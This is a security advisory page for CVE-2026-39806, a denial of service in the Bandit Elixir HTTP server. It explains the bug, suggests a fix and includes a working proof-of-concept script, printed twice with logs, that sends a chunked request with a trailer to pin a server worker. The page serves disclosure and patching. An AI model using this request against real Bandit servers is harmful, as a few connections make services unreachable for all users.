GHSA-RF5Q-VWXW-GMRF

Vulnerability from github – Published: 2026-05-19 19:25 – Updated: 2026-05-19 19:25
VLAI?
Summary
Bandit: Unauthenticated DoS via chunked request trailers in Bandit HTTP/1 decoder
Details

Summary

A worker-pinning denial of service in Bandit's HTTP/1 chunked transfer decoder. Any unauthenticated client that sends a Transfer-Encoding: chunked request whose body ends with a trailer field (RFC 9112 §7.1.2 explicitly permits this) causes the connection's worker process to spin forever in an infinite recursion. A handful of concurrent connections are sufficient to exhaust the listener pool and render the server unresponsive to all further traffic.

The vulnerability was likely introduced with this commit on Dec 6, 2024: https://github.com/mtrudel/bandit/commit/e73e379ab59840e8561b5730878f16e29ab06217

Details

The bug is in lib/bandit/http1/socket.ex in do_read_chunked_data!/5 (around lines 242–274). The terminator clause matches only ["0", "\r\n" <> rest] — i.e. the last-chunk line 0\r\n followed immediately by the empty trailer line. RFC 9112 §7.1.2 allows zero or more trailer fields between 0\r\n and the final \r\n, e.g. a body ending 0\r\nX-T: v\r\n\r\n.

When trailers are present, :binary.split/2 returns ["0", "X-T: v\r\n\r\n"]. The terminator clause does not match. The inner <<_::binary-size(0), ?\r, ?\n, _::binary>> pattern also does not match because rest starts with X. Execution falls into the _ -> arm, which computes to_read = 0 - byte_size(rest) (a negative number) and calls read_available!/2 on the socket. On timeout, read_available!/2 returns <<>>, leaving the buffer unchanged. do_read_chunked_data!/5 then tail-recurses with the same state and makes no forward progress. The worker is pinned for the lifetime of the TCP connection.

The same shape applies to malformed chunk frames where the declared chunk-size disagrees with the actual data length: the binary-size pattern cannot match and read_available! is repeatedly called with no progress.

The gap is acknowledged in the source itself — the comment on line 245 reads: "We should be reading (and ignoring) trailers here".

Suggested fix: after the 0 size line, consume bytes up to \r\n\r\n (parsing/discarding trailers via :erlang.decode_packet(:httph_bin, …)) before returning. Additionally, ensure every recursive arm makes forward progress — when read_available!/2 returns <<>>, raise request_error!(:request_timeout) rather than re-entering with an unchanged buffer.

PoC

A self-contained reproduction script is available below. It starts Bandit 1.10 on 127.0.0.1:4321 with a trivial echo Plug, opens a TCP connection, and sends a single chunked POST whose body is:

  • one 5-byte chunk "hello"
  • the last-chunk marker 0\r\n
  • one trailer field X-Trailer: 1\r\n
  • the terminating \r\n

The request is fully RFC-conformant; many fronting proxies (NGINX, HAProxy) emit this exact shape when forwarding trailer-bearing requests. A correct server responds within milliseconds. With the bug, :gen_tcp.recv/3 times out after 10 seconds because the worker is stuck spinning in do_read_chunked_data!/5.

Steps to reproduce: 1. elixir script.exs 2. Observe the TIMEOUT — worker is pinned in do_read_chunked_data!/5 log line. 3. Each additional concurrent client sending the same request consumes one more worker process.

Impact

Unauthenticated denial of service against any Bandit-fronted HTTP/1 service that accepts chunked request bodies — the default for Phoenix and Plug applications. No authentication, no special headers, and no large payload are required; a small number of attacker-controlled connections is enough to exhaust the worker pool and make the server unreachable for all users. Servers sitting behind proxies that legitimately forward trailer-bearing requests can also be affected without any malicious client involvement.

Script and Logs

# Bandit HTTP/1 chunked decoder hangs on requests with trailer headers.
#
# lib/bandit/http1/socket.ex:242-274 (do_read_chunked_data!/5) terminates
# only when the last-chunk line `0\r\n` is followed *immediately* by the
# empty trailer line `\r\n`. RFC 9112 §7.1.2 allows trailer fields between
# them (e.g. `0\r\nX-T: v\r\n\r\n`). With trailers present, none of the
# match clauses fit: the `_` arm computes `to_read = 0 - byte_size(rest)`
# (negative), calls read_available!/2, gets <<>> on timeout, and recurses
# with the same buffer forever — pinning the worker for the connection's
# lifetime. The line 245 comment ("We should be reading (and ignoring)
# trailers here") acknowledges the gap.
#
# This script starts Bandit 1.10 on 127.0.0.1:4321, sends one chunked POST
# whose body ends with a single trailer field, and waits for a response.
# A correct server replies in milliseconds; the buggy decoder never does.
#
# Run: elixir script.exs

Mix.install([
  {:bandit, "~> 1.10"},
  {:plug, "~> 1.19"}
])

defmodule EchoApp do
  @behaviour Plug
  def init(opts), do: opts

  def call(conn, _opts) do
    {:ok, body, conn} = Plug.Conn.read_body(conn)
    Plug.Conn.send_resp(conn, 200, "got #{byte_size(body)} bytes")
  end
end

defmodule TrailerHang do
  @port 4321
  @recv_timeout_ms 10_000

  def run do
    {:ok, _} = Bandit.start_link(plug: EchoApp, ip: {127, 0, 0, 1}, port: @port)

    {:ok, sock} = :gen_tcp.connect(~c"127.0.0.1", @port, [:binary, active: false])

    request = build_chunked_request_with_trailer()
    log("Sending chunked POST whose body ends with `0\\r\\nX-Trailer: 1\\r\\n\\r\\n`.")
    :ok = :gen_tcp.send(sock, request)

    log("Waiting up to #{div(@recv_timeout_ms, 1000)}s for a response (a correct server replies in ms)…")
    started_at = System.monotonic_time(:millisecond)

    case :gen_tcp.recv(sock, 0, @recv_timeout_ms) do
      {:ok, response} ->
        elapsed = System.monotonic_time(:millisecond) - started_at
        log("Got response after #{elapsed}ms — server handles trailers correctly:")
        IO.puts(binary_part(response, 0, min(byte_size(response), 256)))

      {:error, :timeout} ->
        log("TIMEOUT — worker is pinned in do_read_chunked_data!/5.")
        log("Each concurrent client sending this shape consumes one Bandit worker.")

      {:error, reason} ->
        log("Connection error: #{inspect(reason)}")
    end

    :gen_tcp.close(sock)
  end

  # Body: one 5-byte chunk "hello", last-chunk marker `0\r\n`, one trailer
  # `X-Trailer: 1\r\n`, terminating `\r\n`. RFC-conformant; many proxies
  # (NGINX, HAProxy) emit this shape when forwarding trailer-bearing
  # responses or requests.
  defp build_chunked_request_with_trailer do
    "POST / HTTP/1.1\r\n" <>
      "Host: 127.0.0.1:#{@port}\r\n" <>
      "Transfer-Encoding: chunked\r\n" <>
      "Trailer: X-Trailer\r\n" <>
      "Content-Type: application/octet-stream\r\n" <>
      "\r\n" <>
      "5\r\nhello\r\n" <>
      "0\r\n" <>
      "X-Trailer: 1\r\n" <>
      "\r\n"
  end

  defp log(message), do: IO.puts("[#{Time.utc_now() |> Time.truncate(:millisecond)}] #{message}")
end

TrailerHang.run()

12:36:54.260 [info] Running EchoApp with Bandit 1.10.4 at 127.0.0.1:4321 (http)
[10:36:54.275] Sending chunked POST whose body ends with `0\r\nX-Trailer: 1\r\n\r\n`.
[10:36:54.276] Waiting up to 10s for a response (a correct server replies in ms)…
[10:37:04.276] TIMEOUT — worker is pinned in do_read_chunked_data!/5.
[10:37:04.276] Each concurrent client sending this shape consumes one Bandit worker.
Severity ?
8.7 (High)
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Hex",
        "name": "bandit"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.6.0"
            },
            {
              "fixed": "1.11.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-39806"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-835"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-19T19:25:21Z",
    "nvd_published_at": "2026-05-13T14:17:35Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nA worker-pinning denial of service in Bandit\u0027s HTTP/1 chunked transfer decoder. Any unauthenticated client that sends a `Transfer-Encoding: chunked` request whose body ends with a trailer field (RFC 9112 \u00a77.1.2 explicitly permits this) causes the connection\u0027s worker process to spin forever in an infinite recursion. A handful of concurrent connections are sufficient to exhaust the listener pool and render the server unresponsive to all further traffic.\n\nThe vulnerability was likely introduced with this commit on `Dec 6, 2024`: https://github.com/mtrudel/bandit/commit/e73e379ab59840e8561b5730878f16e29ab06217\n\n### Details\nThe bug is in `lib/bandit/http1/socket.ex` in `do_read_chunked_data!/5` (around lines 242\u2013274). The terminator clause matches only `[\"0\", \"\\r\\n\" \u003c\u003e rest]` \u2014 i.e. the last-chunk line `0\\r\\n` followed *immediately* by the empty trailer line. RFC 9112 \u00a77.1.2 allows zero or more trailer fields between `0\\r\\n` and the final `\\r\\n`, e.g. a body ending `0\\r\\nX-T: v\\r\\n\\r\\n`.\n\nWhen trailers are present, `:binary.split/2` returns `[\"0\", \"X-T: v\\r\\n\\r\\n\"]`. The terminator clause does not match. The inner `\u003c\u003c_::binary-size(0), ?\\r, ?\\n, _::binary\u003e\u003e` pattern also does not match because `rest` starts with `X`. Execution falls into the `_ -\u003e` arm, which computes `to_read = 0 - byte_size(rest)` (a negative number) and calls `read_available!/2` on the socket. On timeout, `read_available!/2` returns `\u003c\u003c\u003e\u003e`, leaving the buffer unchanged. `do_read_chunked_data!/5` then tail-recurses with the same state and makes no forward progress. The worker is pinned for the lifetime of the TCP connection.\n\nThe same shape applies to malformed chunk frames where the declared chunk-size disagrees with the actual data length: the binary-size pattern cannot match and `read_available!` is repeatedly called with no progress.\n\nThe gap is acknowledged in the source itself \u2014 the comment on line 245 reads: *\"We should be reading (and ignoring) trailers here\"*.\n\n**Suggested fix:** after the `0` size line, consume bytes up to `\\r\\n\\r\\n` (parsing/discarding trailers via `:erlang.decode_packet(:httph_bin, \u2026)`) before returning. Additionally, ensure every recursive arm makes forward progress \u2014 when `read_available!/2` returns `\u003c\u003c\u003e\u003e`, raise `request_error!(:request_timeout)` rather than re-entering with an unchanged buffer.\n\n### PoC\nA self-contained reproduction script is available below. It starts Bandit 1.10 on `127.0.0.1:4321` with a trivial echo Plug, opens a TCP connection, and sends a single chunked POST whose body is:\n\n- one 5-byte chunk `\"hello\"`\n- the last-chunk marker `0\\r\\n`\n- one trailer field `X-Trailer: 1\\r\\n`\n- the terminating `\\r\\n`\n\nThe request is fully RFC-conformant; many fronting proxies (NGINX, HAProxy) emit this exact shape when forwarding trailer-bearing requests. A correct server responds within milliseconds. With the bug, `:gen_tcp.recv/3` times out after 10 seconds because the worker is stuck spinning in `do_read_chunked_data!/5`.\n\nSteps to reproduce:\n1. `elixir script.exs`\n2. Observe the `TIMEOUT \u2014 worker is pinned in do_read_chunked_data!/5` log line.\n3. Each additional concurrent client sending the same request consumes one more worker process.\n\n### Impact\nUnauthenticated denial of service against any Bandit-fronted HTTP/1 service that accepts chunked request bodies \u2014 the default for Phoenix and Plug applications. No authentication, no special headers, and no large payload are required; a small number of attacker-controlled connections is enough to exhaust the worker pool and make the server unreachable for all users. Servers sitting behind proxies that legitimately forward trailer-bearing requests can also be affected without any malicious client involvement.\n\n### Script and Logs\n\n```elixir\n# Bandit HTTP/1 chunked decoder hangs on requests with trailer headers.\n#\n# lib/bandit/http1/socket.ex:242-274 (do_read_chunked_data!/5) terminates\n# only when the last-chunk line `0\\r\\n` is followed *immediately* by the\n# empty trailer line `\\r\\n`. RFC 9112 \u00a77.1.2 allows trailer fields between\n# them (e.g. `0\\r\\nX-T: v\\r\\n\\r\\n`). With trailers present, none of the\n# match clauses fit: the `_` arm computes `to_read = 0 - byte_size(rest)`\n# (negative), calls read_available!/2, gets \u003c\u003c\u003e\u003e on timeout, and recurses\n# with the same buffer forever \u2014 pinning the worker for the connection\u0027s\n# lifetime. The line 245 comment (\"We should be reading (and ignoring)\n# trailers here\") acknowledges the gap.\n#\n# This script starts Bandit 1.10 on 127.0.0.1:4321, sends one chunked POST\n# whose body ends with a single trailer field, and waits for a response.\n# A correct server replies in milliseconds; the buggy decoder never does.\n#\n# Run: elixir script.exs\n\nMix.install([\n  {:bandit, \"~\u003e 1.10\"},\n  {:plug, \"~\u003e 1.19\"}\n])\n\ndefmodule EchoApp do\n  @behaviour Plug\n  def init(opts), do: opts\n\n  def call(conn, _opts) do\n    {:ok, body, conn} = Plug.Conn.read_body(conn)\n    Plug.Conn.send_resp(conn, 200, \"got #{byte_size(body)} bytes\")\n  end\nend\n\ndefmodule TrailerHang do\n  @port 4321\n  @recv_timeout_ms 10_000\n\n  def run do\n    {:ok, _} = Bandit.start_link(plug: EchoApp, ip: {127, 0, 0, 1}, port: @port)\n\n    {:ok, sock} = :gen_tcp.connect(~c\"127.0.0.1\", @port, [:binary, active: false])\n\n    request = build_chunked_request_with_trailer()\n    log(\"Sending chunked POST whose body ends with `0\\\\r\\\\nX-Trailer: 1\\\\r\\\\n\\\\r\\\\n`.\")\n    :ok = :gen_tcp.send(sock, request)\n\n    log(\"Waiting up to #{div(@recv_timeout_ms, 1000)}s for a response (a correct server replies in ms)\u2026\")\n    started_at = System.monotonic_time(:millisecond)\n\n    case :gen_tcp.recv(sock, 0, @recv_timeout_ms) do\n      {:ok, response} -\u003e\n        elapsed = System.monotonic_time(:millisecond) - started_at\n        log(\"Got response after #{elapsed}ms \u2014 server handles trailers correctly:\")\n        IO.puts(binary_part(response, 0, min(byte_size(response), 256)))\n\n      {:error, :timeout} -\u003e\n        log(\"TIMEOUT \u2014 worker is pinned in do_read_chunked_data!/5.\")\n        log(\"Each concurrent client sending this shape consumes one Bandit worker.\")\n\n      {:error, reason} -\u003e\n        log(\"Connection error: #{inspect(reason)}\")\n    end\n\n    :gen_tcp.close(sock)\n  end\n\n  # Body: one 5-byte chunk \"hello\", last-chunk marker `0\\r\\n`, one trailer\n  # `X-Trailer: 1\\r\\n`, terminating `\\r\\n`. RFC-conformant; many proxies\n  # (NGINX, HAProxy) emit this shape when forwarding trailer-bearing\n  # responses or requests.\n  defp build_chunked_request_with_trailer do\n    \"POST / HTTP/1.1\\r\\n\" \u003c\u003e\n      \"Host: 127.0.0.1:#{@port}\\r\\n\" \u003c\u003e\n      \"Transfer-Encoding: chunked\\r\\n\" \u003c\u003e\n      \"Trailer: X-Trailer\\r\\n\" \u003c\u003e\n      \"Content-Type: application/octet-stream\\r\\n\" \u003c\u003e\n      \"\\r\\n\" \u003c\u003e\n      \"5\\r\\nhello\\r\\n\" \u003c\u003e\n      \"0\\r\\n\" \u003c\u003e\n      \"X-Trailer: 1\\r\\n\" \u003c\u003e\n      \"\\r\\n\"\n  end\n\n  defp log(message), do: IO.puts(\"[#{Time.utc_now() |\u003e Time.truncate(:millisecond)}] #{message}\")\nend\n\nTrailerHang.run()\n```\n\n```logs\n12:36:54.260 [info] Running EchoApp with Bandit 1.10.4 at 127.0.0.1:4321 (http)\n[10:36:54.275] Sending chunked POST whose body ends with `0\\r\\nX-Trailer: 1\\r\\n\\r\\n`.\n[10:36:54.276] Waiting up to 10s for a response (a correct server replies in ms)\u2026\n[10:37:04.276] TIMEOUT \u2014 worker is pinned in do_read_chunked_data!/5.\n[10:37:04.276] Each concurrent client sending this shape consumes one Bandit worker.\n```",
  "id": "GHSA-rf5q-vwxw-gmrf",
  "modified": "2026-05-19T19:25:21Z",
  "published": "2026-05-19T19:25:21Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/mtrudel/bandit/security/advisories/GHSA-rf5q-vwxw-gmrf"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39806"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mtrudel/bandit/commit/ae3520dfdbfab115c638f8c7f6f6b805db34e1ab"
    },
    {
      "type": "WEB",
      "url": "https://cna.erlef.org/cves/CVE-2026-39806.html"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/mtrudel/bandit"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/EEF-CVE-2026-39806"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Bandit: Unauthenticated DoS via chunked request trailers in Bandit HTTP/1 decoder"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.